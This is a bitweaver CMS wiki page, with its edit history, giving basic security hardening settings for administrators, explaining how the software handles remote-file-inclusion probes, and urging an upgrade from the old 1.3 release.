History of Security

Version 1

Security

bitweaver security settings

Created by: laetzer, Last modification: 05 Feb 2008 (08:50 UTC) by laetzer

Bitweaver 2


security settings

  • in /kernel/config_inc.php the parameter IS_LIVE should be true (it's true by default)
  • rename your /install/ directory after installation
  • optimize PHP for security (links)
  • optimize Apache (links)
  • anonymous users shouldn't be allowed to attach all the files they want to wiki pages and other content
  • if comments are enabled anywhere, definitely enable also HTMLPurifier, it strips malicious code

security alerts

(some examples of security issues that were discovered and how they've been addressed or don't exist)

hacking attempts

unknown column/sort order

The script kiddie plague du jour is the idea to exploit code that does: include( $varWithSomeUrlFromGetString ); which would execute remotely written PHP. If such an attack is attemped, a bitweaver install might mail an error message to you, the admin. Note that the normal user browsing your pages will never see an error message unless you set IS_LIVE to false in /kernel/config_inc.php which by default is set to true. Also, the error mail basically informs you, that the attemptet hack failed, actually that it didn't do anything.

Bitweaver 1.3 and before

Bitweaver's 1.x versions were released in 2004 and the beginning of 2005 (see bitweaverRoadMap). These versions are really old now, and not well supported anymore. They got some serious security issues, many of which come from 3rd party code, like left-over code from older versions, the infamous Xmlrpc bug, and others. These and bitweaver's own bugs resulted in quite a bad reputation at times. Thus, many of the improvements which were introduced with bitweaver 2, addressed these issues specifically. In other words, don't install version 1.3 anymore. If you're running version 1.3 and are concerned about security, consider upgrading bitweaver.
Page History
Date/CommentUserIPVersion
13 Feb 2010 (19:57 UTC)
added alias
laetzer85.178.0.1706
Current • Source
Benjamin Couhe80.4.75.275
View • Compare • Difference • Source
laetzer141.20.150.434
View • Compare • Difference • Source
laetzer141.20.150.433
View • Compare • Difference • Source
laetzer85.178.63.1672
View • Compare • Difference • Source
laetzer85.178.3.1651
View • Compare • Difference • Source